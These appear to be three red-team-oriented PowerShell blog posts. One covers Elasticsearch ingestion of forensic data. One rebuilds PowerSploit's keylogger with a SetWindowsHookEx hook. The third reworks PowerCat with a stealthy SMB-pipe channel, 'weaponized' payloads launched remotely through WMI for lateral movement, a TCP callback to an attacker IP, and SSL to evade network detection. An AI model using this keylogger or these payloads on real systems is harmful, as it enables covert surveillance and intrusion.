Tuesday, February 16, 2016

PowerStash: Accelerating the Hunt with Elastic

Ever since I was a PowerShell Padawan, I've been told that proper output comes in the form of an object. But what do you do with those objects? You could write them to disk as comma-separated values with the built-in Export-Csv cmdlet, or better yet as XML via Export-Clixml. However, when hunting in an enterprise network and collecting potentially millions of forensic artifacts, the scalability of CSV and XML diminishes quickly. What you really need, Chancho, is a pair of stretchy pants.

You've probably heard of the ELK stack: Elastic (formerly Elasticsearch), Logstash, and Kibana. Elastic is the NoSQL search engine, Logstash handles data insertion, and Kibana provides the web-based UI. As the title of this post implies, I've taken a PowerShell approach to replacing Logstash's functionality. While Logstash is great, it does have limitations. For example, to collect all of the event logs from a Windows domain you'd need to install a log forwarder on each machine to send its event logs to Logstash. Thankfully, PowerShell's built-in cmdlets for retrieving data, coupled with Elastic's open-source nature, have made the marriage of these two capabilities fairly straightforward. Not only that, but with PowerShell we can get so much more than event logs. Let's get started.

The first, and most important, thing is to configure an Elastic instance capable of handling the amount of data we're going to throw at it. There are plenty of write-ups on how to tune Elastic, so I won't write one here; I took my pointers directly from Brad Lhotsky's outline for a write-heavy configuration. Next we need to write some code... wait, I already did that part (or at least started it) for you. Realistically, I've written a light binding for Elasticsearch.Net, but it is more than capable of stashing all the things. Please feel free to contribute to the project and expand the binding I've started.

Elasticsearch.Net provides access to all of Elastic's APIs, primarily in the form of a client that knows how to interact with an Elastic instance. All that really needs to be done is to instantiate a client that matches your Elastic configuration. There are a couple ways to do this with PowerStash via New-ElasticClient. Let's start simple.
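A minimal sketch of the simple path; note that the -Uri parameter name is my assumption about New-ElasticClient's interface, since a default client only needs to know where the node lives:

```powershell
# Simple case: point the client at a single node.
# NOTE: -Uri is an assumed parameter name; check Get-Help New-ElasticClient.
$Client = New-ElasticClient -Uri 'http://localhost:9200'
```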
For a more complex configuration, start by creating a connection pool, which feeds into a connection configuration, and finally into a fully configured client.
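The fuller pipeline might look like the following sketch. The Elasticsearch.Net type names are assumptions based on the 2.x line of the library (they differ between versions), and -Configuration is an assumed parameter name:

```powershell
# Pool of nodes -> connection configuration -> fully configured client.
# Type names assume Elasticsearch.Net 2.x; adjust for the version PowerStash ships with.
$Uris   = [Uri[]]@('http://node1:9200', 'http://node2:9200')
$Pool   = New-Object Elasticsearch.Net.StaticConnectionPool -ArgumentList (,$Uris)
$Config = New-Object Elasticsearch.Net.ConnectionConfiguration -ArgumentList $Pool
$Client = New-ElasticClient -Configuration $Config   # -Configuration is an assumed parameter name
```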

To index a lot of information quickly, Elastic's Bulk API is paramount; PowerStash uses it exclusively, since it can index a single object/document or many. To use the Bulk API, objects being indexed into Elastic need to be converted into the proper format using New-BulkIndexRequest. Conversion is a pretty short order, thanks to PowerShell's ConvertTo-Json cmdlet, as illustrated below.
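To give a feel for the format, here is a hypothetical stand-in for New-BulkIndexRequest (not the module's actual code): the Bulk API expects newline-delimited JSON, with an action/metadata line preceding each document line.

```powershell
# Illustrative helper only; New-BulkIndexRequest's real implementation may differ.
function ConvertTo-BulkIndexJson {
    param(
        [Parameter(ValueFromPipeline = $true)]$InputObject,
        [string]$Index = 'powerstash'
    )
    process {
        # The action/metadata line tells Elastic where the next document belongs.
        $Action = @{ index = @{ _index = $Index; _type = $InputObject.TypeName; _id = $InputObject.Id } }
        (ConvertTo-Json -InputObject $Action -Compress) + "`n" +
        (ConvertTo-Json -InputObject $InputObject -Compress) + "`n"
    }
}
```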

Weaving these pieces together results in a scalable replacement for writing objects to disk with Export-Csv/Clixml... Export-Elastic, which I've written to work similarly to the aforementioned exporters.
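Usage is meant to feel familiar; the parameter names below are assumptions about Export-Elastic's interface rather than its documented signature:

```powershell
# Assumed shape, mirroring Export-Csv's pipeline ergonomics.
$Client = New-ElasticClient -Uri 'http://localhost:9200'   # -Uri is an assumed parameter
Get-WmiObject -Class Win32_NTLogEvent -Filter "LogFile='Security'" |
    Export-Elastic -Client $Client -Index 'hunt-2016.02'
```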

For objects to be indexed correctly they need to have a few specific properties. Elastic has date/time formats that must be used, so if your objects have any [DateTime] properties, they need to be converted. Additionally, every object being indexed needs to have a UUID "Id" property; in Windows that's a GUID. To let PowerStash handle the indexing, every object also needs to have a DateCreated property and a TypeName. I've applied these changes to the Win32_NTLogEvent object below.
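A sketch of that reshaping (the property selection here is mine, not the module's exact output):

```powershell
Get-WmiObject -Class Win32_NTLogEvent -Filter "LogFile='System'" | ForEach-Object {
    # WMI returns DMTF datetime strings; convert, then emit an Elastic-friendly format.
    $Time = [Management.ManagementDateTimeConverter]::ToDateTime($_.TimeGenerated)
    [PSCustomObject]@{
        Id          = [Guid]::NewGuid().Guid                                    # unique document id
        DateCreated = $Time.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')  # Elastic date format
        TypeName    = 'NTLogEvent'                                              # used as the mapping type
        EventCode   = $_.EventCode
        SourceName  = $_.SourceName
        Message     = $_.Message
    }
}
```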

One of the awesome things about Elastic is its type inference, but in testing I found that it's best to create an index template so Elastic knows explicitly what your objects' types are. An index template is a simple JSON representation that needs to be sent to Elastic, as follows.
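Something like the following, where the index pattern and field names are illustrative; the endpoint is Elastic 2.x's _template API:

```powershell
$Template = @'
{
  "template": "powerstash-*",
  "mappings": {
    "NTLogEvent": {
      "properties": {
        "DateCreated": { "type": "date", "format": "date_time_no_millis" },
        "EventCode":   { "type": "long" },
        "Message":     { "type": "string" }
      }
    }
  }
}
'@
# Register the template so every matching index gets these mappings.
Invoke-RestMethod -Method Put -Uri 'http://localhost:9200/_template/powerstash' -Body $Template
```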

The only thing left to do is ramp up the data collection for stress-testing. I've gotten pretty good throughput, ~18k objects per minute, by running the collection in a separate runspace and exporting objects to Elastic on the main thread as data is returned. I've provided the functionality to do this via Invoke-Powerstash. I'd love for you to test this for yourself and report back how well it worked, or if it's failing. Combining PowerStash with a tool like CimSweep has the potential to bring enterprise hunting to a manageable level.
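Stripped of the module's plumbing, the collect-in-a-runspace pattern looks roughly like this (PowerStash streams results to Elastic as they arrive; this simplified sketch just drains them at the end):

```powershell
# Collection runs in its own runspace so the main thread stays free.
$PS = [PowerShell]::Create().AddScript('Get-WmiObject -Class Win32_NTLogEvent')
$Handle = $PS.BeginInvoke()
# ... the main thread is free here while collection runs ...
$Results = $PS.EndInvoke($Handle)   # blocks until the runspace finishes
```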

Tuesday, January 19, 2016

Scripting A Windows Key Logger

I recently seized the opportunity to contribute to a project, PowerSploit, that I've often used for reference and gleaned a wealth of knowledge from. An issue was opened for the project's key-logger the day after Christmas 2015, and as I hastily skimmed through my emails before deleting them, I stopped for a moment to read it. Coldalfred writes, "When i execute as default or -PollingInterval 100 or 10000 or 40 that is the default make the Powershell process consume a lot of CPU that is normal?" I had some free time to kill, so I decided to investigate the issue and determine whether it might be fixable.

I was able to verify the issue Coldalfred reported. As it turns out, the PollingInterval parameter was not being passed into the initialization routine. This parameter sets a sleep statement designed to throttle the key-checking loop. PowerShell's Start-Sleep cmdlet throws a non-terminating error when null values are supplied as input, but since this particular instance was executed as a background job, it wasn't readily apparent that the error was occurring. In addition to masking this error, the use of jobs was causing excessive memory consumption. My initial intent was to repair the PollingInterval parameter and replace the background job with a runspace. Below is a truncated code snippet to highlight the situation.
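A reconstructed sketch of the failure mode (not PowerSploit's exact code):

```powershell
# $PollingInterval never reached the job's scope, so the throttle below binds
# $null and Start-Sleep raises a non-terminating error on every pass --
# silently, because it happens inside a background job.
$Initialization = {
    while ($true) {
        # ... GetAsyncKeyState checks across the whole keyboard ...
        Start-Sleep -Milliseconds $PollingInterval   # $null here = error + unthrottled loop
    }
}
Start-Job -ScriptBlock $Initialization | Out-Null    # the job also hoards memory
```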

By this time, the project's creator had closed Coldalfred's issue as already known, commenting, "...SetWindowsHookEx would make for a much better keylogger but that would require placing a DLL on disk." The benefit of using SetWindowsHookEx is that you can hook all processes in a desktop simultaneously and guarantee delivery of their key messages as they happen, rather than exhaustively checking the state of every key via GetAsyncKeyState and missing at least a few. I did some research into this idea and came across an interesting piece by Hans Passant. Hans explains that there are actually two hook types that don't require a DLL, and one of them is for low-level keyboard messages. The key to this type of hook is the use of a loop that checks for messages in the queue after setting the hook. The PeekMessage function is used below to check the queue, with a filter specifying that only keyboard messages (0x100-0x109) be retrieved for processing.
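In outline, the hook and its pump look like this; the P/Invoke pieces ([User32], the MSG struct in $Msg, $Callback, and $ModuleHandle) are assumed to be defined elsewhere via Add-Type, so treat this as a sketch rather than the final code:

```powershell
# WH_KEYBOARD_LL = 13: a low-level keyboard hook needs no DLL on disk.
$Hook = [User32]::SetWindowsHookEx(13, $Callback, $ModuleHandle, 0)

while ($true) {
    # PM_NOREMOVE = 0; the 0x100-0x109 filter restricts retrieval to keyboard messages.
    [void][User32]::PeekMessage([ref]$Msg, [IntPtr]::Zero, 0x100, 0x109, 0)
    Start-Sleep -Milliseconds 10   # keep the pump itself from spinning a core
}
```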

Even though PowerShell and C# both run atop the .NET framework and have interoperability with the Windows API, getting PowerShell to do things that seem trivial in C# can sometimes require a bit of ingenuity. This happened to be one of those times. The use of SetWindowsHookEx relies on an application-defined LowLevelKeyboardProc callback function to process the keyboard messages it retrieves. This means I have to convince an unmanaged API function to execute managed .NET scripting as a callback function. Thankfully, I'd read about working with unmanaged callback functions in PowerShell during previous internet wanderings and was able to successfully implement it, as demonstrated below.
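The trick, in sketch form: define a matching delegate type with Add-Type, then let PowerShell convert a scriptblock into that delegate so SetWindowsHookEx receives something it can call from unmanaged code. The delegate name here is mine, and [User32] is assumed to be defined elsewhere:

```powershell
# Delegate signature mirrors the Windows API's LowLevelKeyboardProc.
Add-Type -TypeDefinition @'
public delegate System.IntPtr KeyboardProc(int nCode, System.IntPtr wParam, System.IntPtr lParam);
'@

# PowerShell converts the scriptblock into a native-callable delegate.
$Callback = [KeyboardProc]{
    param($nCode, $wParam, $lParam)
    # ... decode and log the keystroke described by $lParam ...
    [User32]::CallNextHookEx([IntPtr]::Zero, $nCode, $wParam, $lParam)   # pass it along
}
```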

All that's left to do is wrap everything up, drop it into a separate runspace, and execute.
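Roughly this shape, where $KeyLoggerScript holds everything above:

```powershell
# Run the hook loop in its own runspace so the caller's session stays responsive.
$Runspace = [RunspaceFactory]::CreateRunspace()
$Runspace.Open()
$PS = [PowerShell]::Create()
$PS.Runspace = $Runspace
[void]$PS.AddScript($KeyLoggerScript).BeginInvoke()
```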

The entire, non-truncated, source can be found here.

Tuesday, January 12, 2016

PowerCat

I don't think there are any members of the InfoSec community who aren't familiar with the TCP/IP Swiss army knife that is Netcat. So naturally, when I learned that someone had written a similar tool in PowerShell, I was intrigued. It was months after learning about Mick Douglas's and Luke Baggett's original version of PowerCat that I actually tried out the tool and reviewed its implementation. What Mick and Luke started was quite ingenious, and I must give credit where it is due. However, I think most people would agree that the code's lack of adherence to PowerShell best practices made it very difficult to follow and contribute to. Contributors did, however, file issues for excessive CPU usage, file transfers not working, unexpected errors, and inoperable functionality; one pull request also attempted to add SSL encryption. All of this inspired me to dismantle and rebuild their work from the ground up.

During my dismantling I discovered that calls were being made to external binaries. As an amateur PowerShell purist, I was determined to remove these external dependencies and replace them with equivalent .NET implementations. In particular, Netstat was being used to test for available ports and Nslookup was being used to craftily communicate with dnscat2 (very cool). I was able to write a helper function to replace Netstat. I ended up removing the dnscat2 functionality to exclude Nslookup, but I hope you'll agree that I made up for this by adding a covert channel of my own; more on that later.
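The Netstat replacement boils down to one .NET call; my helper looked roughly like this (the function name in PowerCat may differ):

```powershell
function Test-TcpPortInUse {
    param([int]$Port)
    # The same data netstat reads, straight from the IP stack.
    $Listeners = [Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpListeners()
    [bool]($Listeners | Where-Object { $_.Port -eq $Port })
}
Test-TcpPortInUse -Port 445
```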

Further along, I realized that the capture of command output had been over-engineered: the standard out/error streams of a process were being redirected and read asynchronously. This required additional functions and was the first contributor to excessive CPU usage. I found a simple remedy by running all user input in a scriptblock and letting PowerShell handle the output and errors for me.

What started as 40 lines of code...

...was reduced to less than 10 lines, and no extra function definitions.
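In spirit, the replacement is just this (simplified from the project's actual code; $Command holds the user's input):

```powershell
# Run the user's input as a scriptblock; merging the error stream (2>&1)
# lets PowerShell hand back output and errors in a single string.
$ScriptBlock = [ScriptBlock]::Create($Command)
$Output = & $ScriptBlock 2>&1 | Out-String
```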

Moreover, the excessive CPU usage arose from a by-design loop that continuously checks for completed asynchronous operations without any throttle control. You can test a simplified version of this yourself by opening Task Manager and having a look at PowerShell's CPU statistics while running the following one-liners.
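Simplified stand-ins for that polling loop; run each one and watch PowerShell's CPU column (Ctrl+C to stop):

```powershell
# 1. Unthrottled polling, as the original code did it -- pins a core:
while ($true) { $Done = $false }

# 2. The same loop with throttle control -- idles near zero:
while ($true) { $Done = $false; Start-Sleep -Milliseconds 100 }
```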

With the CPU consumption cured, I was able to start sprinkling in my own improvements. Most notably, making up for the removal of dnscat2 functionality by adding in a covert communication channel that leverages SMB pipes for stealth. The beauty of SMB pipes is two-fold. First, they communicate over a port (445) that has to be open in a Windows domain and is usually open by default in non-domain scenarios. Second, all SMB pipe communications are owned by the System process; i.e. PID 4. This makes it especially difficult for investigators to determine that the connection was actually originating from PowerShell.
There is one caveat to the SMB pipe communications: the .NET classes supporting them weren't available until version 3.5.1. While this technically means that SMB pipes aren't fully supported in PowerShell v2, most machines that only have v2 installed also have .NET 3.5.1 installed. In my testing, the SMB pipes work flawlessly on Windows 7 with v2, but I have not tested back to Windows Vista or XP. With a covert comms channel back in the mix, we can move on to weaponizing this code for field use.
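The supporting classes live in System.IO.Pipes; a bare-bones sketch of both ends (the pipe and server names are illustrative, not PowerCat's exact code):

```powershell
# Server: listens on \\.\pipe\PowerCat, reachable over SMB (TCP 445).
$Server = New-Object IO.Pipes.NamedPipeServerStream('PowerCat', [IO.Pipes.PipeDirection]::InOut)
$Server.WaitForConnection()

# Client: connects from another machine to \\ServerName\pipe\PowerCat.
$Client = New-Object IO.Pipes.NamedPipeClientStream('ServerName', 'PowerCat', [IO.Pipes.PipeDirection]::InOut)
$Client.Connect(3000)   # timeout in milliseconds
```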

Mick and Luke did a great job of packaging the code for execution, and I used their implementation as the basis for my own. I've received several requests (and will likely oblige them in the near future) to package my version into a single script so that it will be more portable. My standard response is that the packaging feature already exists via New-PowerCatPayload. This function was designed for weaponizing and outputs a customized script payload perfect for distribution to remote machines. Let's look at an example of how to do that, using WMI.
With just two lines, the payload is created and running by abusing the Create method of WMI's Win32_Process class. As shown above, Invoke-WmiMethod reports that it successfully created (ReturnValue = 0) a new process with PID 6800. The host PowerShell's PID is 2740 and its working directory is C:\Users; connecting to the PowerCat listener shows a working directory of C:\Windows\System32 and execution from PID 6800. A TCP-callback payload, pictured below, works a little differently: create a new payload that specifies your machine as the -RemoteIp, start your local TCP listener first, then use WMI to execute the TCP payload on a remote machine. In these examples everything is running on the local machine; to run against a remote machine, the -ComputerName parameter must be supplied to Invoke-WmiMethod. This is a very simple way to move laterally through a network.
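The two-line pattern, with placeholder values (New-PowerCatPayload's parameters beyond -RemoteIp are my assumptions about its interface):

```powershell
# Build the payload, then abuse Win32_Process.Create to launch it on a remote host.
$Payload = New-PowerCatPayload -RemoteIp '192.168.1.10' -Port 443   # -Port is an assumed parameter
Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName 'Target01' `
    -ArgumentList "powershell -NoProfile -Command $Payload"
```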
The final piece of this puzzle was to hide PowerCat's traffic from network detection mechanisms using encryption. In a pull-request to Mick and Luke's project there was an implementation of self-signed X509 certificate creation and SSL encryption, adding 595 lines of code to the project. I was quite pleased to discover that there is actually a COM interface for creating X509 certificates and was able to create my own helper function with only 50 lines of code. SSL, check. You can find the entire project here.
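Abbreviated, the COM route looks like this; the full helper also creates the private key ($Key below) and sets extensions, so treat this as a sketch of the X509Enrollment interface rather than the finished function:

```powershell
# X509Enrollment COM objects build a self-signed certificate with no extra DLLs.
$Name = New-Object -ComObject X509Enrollment.CX500DistinguishedName
$Name.Encode('CN=PowerCat', 0)

$Request = New-Object -ComObject X509Enrollment.CX509CertificateRequestCertificate
$Request.InitializeFromPrivateKey(1, $Key, '')   # $Key: a CX509PrivateKey created beforehand
$Request.Subject = $Name
$Request.Issuer  = $Name                          # self-signed: issuer == subject

$Enrollment = New-Object -ComObject X509Enrollment.CX509Enrollment
$Enrollment.InitializeFromRequest($Request)
$Enrollment.Enroll()
```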